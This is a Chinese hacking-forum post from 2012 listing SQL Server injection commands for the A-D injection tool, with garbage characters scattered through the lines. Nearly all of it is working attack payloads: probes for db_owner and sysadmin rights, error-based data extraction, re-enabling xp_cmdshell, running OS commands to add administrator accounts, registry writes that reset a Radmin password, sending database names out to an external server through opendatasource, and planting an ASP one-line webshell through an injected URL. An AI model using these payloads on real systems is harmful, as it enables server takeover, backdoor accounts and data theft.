找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1864|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
" s6 r1 \2 h# R4 J, E//看看是什么权限的
7 ]9 a/ w- S5 t1 v0 S1 _% Qand 1=(Select IS_MEMBER('db_owner'))+ W# w9 a7 T1 q- c9 B) U( |- N
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
4 ?6 W' Q: e5 ^( v( h+ D. r  C/ R( _: q+ F& y% ~
//检测是否有读取某数据库的权限* J: z* G( c. ?
and 1= (Select HAS_DBACCESS('master'))( E$ b1 T. u3 C" u) ~
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
( k1 R- R3 E* {# r; K4 I
2 A) V' n. o* y5 ]
9 O' e$ `/ @6 P4 O+ }& b! n5 s' ?* Q数字类型
; q+ ?; u3 l  |5 e5 mand char(124)%2Buser%2Bchar(124)=0& c) J2 n: z6 c' F! F; P
4 [* c# x; v6 u7 h: v& t$ G0 ~
字符类型) g- `! {+ L  W6 p
' and char(124)%2Buser%2Bchar(124)=0 and ''='
1 O- S: ?) g* l: r, K3 u/ d
  Y) k, O6 |5 k+ c! M9 b搜索类型
/ W/ o- P1 b$ V' and char(124)%2Buser%2Bchar(124)=0 and '%'='3 h$ K5 T% G" d% F- u( }
" u$ I7 @3 a0 C0 s8 w: `( G
爆用户名7 r+ F! J; A1 F' N# u
and user>0: ^$ a4 \* }2 `  W
' and user>0 and ''='4 J: |- M4 e6 D: E, e+ M

" e+ Y' p4 {+ R# P- G检测是否为SA权限
) ^* e+ E6 K' a$ U8 s* }- Yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--+ f0 j4 L5 b  N; I) I
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --, s( @& S& h) l
8 w$ l1 q+ r; p7 m) Q& y' M
检测是不是MSSQL数据库$ F2 Z5 y9 ^+ M) b; F5 a
and exists (select * from sysobjects);--
% X/ |5 B7 [8 G& C, x! R2 ?: \4 U( q: w/ d* K5 U3 H: g" C& g
检测是否支持多行
) x8 c* K  O$ L; o% c9 G/ O/ S* O;declare @d int;--
* W6 I: @' W* ]! v1 z6 C; z4 i& T4 |* d' K+ \9 [# r! j
恢复 xp_cmdshell4 ?% G. Q" }6 n3 N/ U0 w( Q0 Z
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--& a! i! ^6 }; L* `* R! l1 K6 p9 l
- H7 M7 Q- }0 t& ?6 l
1 R: d% h2 h( O2 a, o$ B" l) U+ T8 h
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') " p, m+ X: h1 h2 C
% Y" r0 }& b0 _. F# F1 @
//-----------------------
5 E0 d7 C. _9 _/ H, N0 t4 I//      执行命令
7 A8 h% u" A, O2 W//-----------------------. z$ N  Q$ |% F/ r: w4 P6 a$ V
首先开启沙盘模式:$ j7 p& i; N+ A$ n5 h3 J* O$ K
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1% b/ k2 b: ~, \* s% ?+ T3 }9 U
$ D! L2 Q; f: k: R. u# l7 b1 N% }
然后利用jet.oledb执行系统命令
9 H3 T4 @$ E. Gselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
+ f9 q' L5 L2 l+ A, ]5 d  k# b2 k5 P% |/ E" g* G8 b
执行命令7 m0 M+ g! J- ~; ?4 Q1 ]* i
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--' Q/ @( ]/ ]" m1 t
0 I6 E: o' j7 S/ d4 Q3 k& H' [  K
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
+ \6 k8 N: l' u
- X# W4 l9 A, i+ K" g判断xp_cmdshell扩展存储过程是否存在:
9 i5 F3 T) T6 g; Chttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')* w2 R9 U/ \. C0 g
0 E" r4 s' t; \4 ^( m
写注册表
! h1 d4 ~7 `% B4 r0 {) Aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1# ~! Q0 o2 j# x: y7 {, p" W$ ~

/ L' n8 L/ @+ o4 q7 |REG_SZ" F  G. s9 z" B3 Y: ?

' Z- E& G$ O9 ?! r$ W读注册表
; {$ E  [1 U5 n' x* Rexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'# y/ E, m4 i( c" J8 ?5 S
4 F$ r4 ^5 u6 [! A' l
读取目录内容& O. L" |) H; q8 v+ a& \
exec master..xp_dirtree 'c:\winnt\system32\',1,16 `+ r0 z1 `: A1 x" h

5 W- k7 n4 K% i2 ?9 w* g5 A
9 p& B4 k9 w- T* \# P7 g数据库备份4 X' z9 G# t$ l( ?  Y: v( T
backup database pubs to disk = 'c:\123.bak'
! h. V) H7 f6 v- ?
) T! Y( l9 o$ M//爆出长度
9 g7 J& h! U. pAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--! ?' K4 f, Q) w2 p! \& e8 G
! q) F4 x! {0 U3 f$ n- [9 o+ ~
# Q7 r5 e) {* e: u9 X5 e% f/ D/ j+ E
, V; ?  r1 R0 Z! Y
更改sa口令方法:用sql综合利用工具连接后,执行命令:+ I6 @$ b5 T, |  c8 N7 P
exec sp_password NULL,'新密码','sa', b4 \0 @1 h! L0 v. a
9 C# E0 @- D: s) C' t1 y
添加和删除一个SA权限的用户test:
& R: t7 @' m6 u2 nexec master.dbo.sp_addlogin test,ptlove6 N, ?7 u+ n/ w' x
exec master.dbo.sp_addsrvrolemember test,sysadmin
8 l4 Y* n, y% Y. ~/ v& w* C- e8 B( [- n, e1 X1 F% Z
删除扩展存储过过程xp_cmdshell的语句: 1 N2 E0 _2 j8 N6 t: }
exec sp_dropextendedproc 'xp_cmdshell'
1 g/ f* K  U' V0 N
( I6 w1 c7 j, m, S$ K$ e' C添加扩展存储过过程3 _! F" s( {! R# R
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' * @4 V& `7 G' t2 z8 r
GRANT exec On xp_proxiedadata TO public
1 l2 L; L" U! C- @  t* ]
; X9 K$ |0 V/ P& G. o+ n
. X6 @! j, C5 e5 Z停掉或激活某个服务。 % ~: k6 O8 k1 |8 b

5 g' q. ]0 h. i' texec master..xp_servicecontrol 'stop','schedule'- p) [5 X4 Q8 l
exec master..xp_servicecontrol 'start','schedule'
6 h) v/ P( a+ J
( @5 X9 A, q4 M% ^5 l5 {& T6 f1 cdbo.xp_subdirs
6 [$ M+ s- Z( {0 t4 l& ~; ^9 o. _  [  i  }: c
只列某个目录下的子目录。
7 |# e, H" }: _. v1 D- F1 xxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
/ Z+ k, {% B6 U9 q
. s  H# i. y8 ^. Y8 jdbo.xp_makecab! ]9 \# U' b4 w
6 ]& n" H8 y" A& C7 [: g) J
将目标多个档案压缩到某个目标档案之内。$ S, I, Q5 p8 i% Y! o2 i4 T; a
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。8 w  g7 O0 q7 m' X3 r6 o

! }/ i' w" h/ _: vdbo.xp_makecab, w% ~9 n( K: X* ^+ Q
'c:\test.cab','mszip',1,+ D7 M% T- r: @
'C:\Inetpub\wwwroot\SQLInject\login.asp',
0 ]1 e! W2 F& G( c+ L3 w+ u* a% j'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'4 Q, `8 D& Y  s
8 C6 D+ a2 I- c* {
xp_terminate_process( |- N4 x( p9 A! A: R) i7 P  V, `3 T/ k
, w) `8 K) w, z. T' k+ l- B1 |
停掉某个执行中的程序,但赋予的参数是 Process ID。; ]  B# l' d% R7 _1 a
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
0 g) k7 l* g+ R6 S- g1 j
7 U2 v% X* S" p7 @9 exp_terminate_process 2484
# r, c1 f! V$ @3 E1 W# i7 o8 v% F$ C+ \: R9 E% I9 ?0 x! f
xp_unpackcab
* T2 K  X; @( K2 V: t5 U6 L& l/ t
' K" v' Q: P, p解开压缩档。6 X9 u! _8 R% X  y! b' x8 A! g% H

, P+ }" y- k1 p9 O2 z9 o" O* rxp_unpackcab 'c:\test.cab','c:\temp',1
2 \2 g% W1 L4 @" D; R0 O: p
1 f) b- [4 l0 z3 S- k  m1 S( O' H* u# Z% v9 P
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* B' P  @, s. r" [( S
8 J0 ^9 a+ z6 f" s# l, Bcreate database lcx;! w3 X, Q2 x6 K% F9 p6 L
Create TABLE ku(name nvarchar(256) null);
- M' ~5 w# e  g  M! l# ZCreate TABLE biao(id int NULL,name nvarchar(256) null);1 P% o; o* w4 n. l6 B3 Y+ V
4 ]/ ?4 T. a9 V! x& @3 H% \6 u  H  }6 x
//得到数据库名1 s7 y3 j, Q6 |; G2 S% v! j
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
4 i  `  Z& n% }0 W0 L# Y
* A7 Q- q4 k( s3 I4 E5 N- v; y& Y* @1 ~# V3 F# }8 K
//在Master中创建表,看看权限怎样
% v3 \( q* }4 KCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--/ y, }* [$ N$ w$ s
5 N2 d3 H. n  ?% g% H6 l: T/ Z3 z
用 sp_makewebtask直接在web目录里写入一句话马:
# y9 {) ]( V2 {5 i. _http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--( w* p. x+ j  I6 a. I

, o( ~% ?) P7 ~* V- N. h# Y//更新表内容+ H% o7 A  R: }7 s" x
Update films SET kind = 'Dramatic' Where id = 1230 _6 |& R& ]6 i* d+ E( g

3 n1 W+ P# I( X6 i) T- q//删除内容
% H4 @3 {) S; {9 z6 }. Xdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表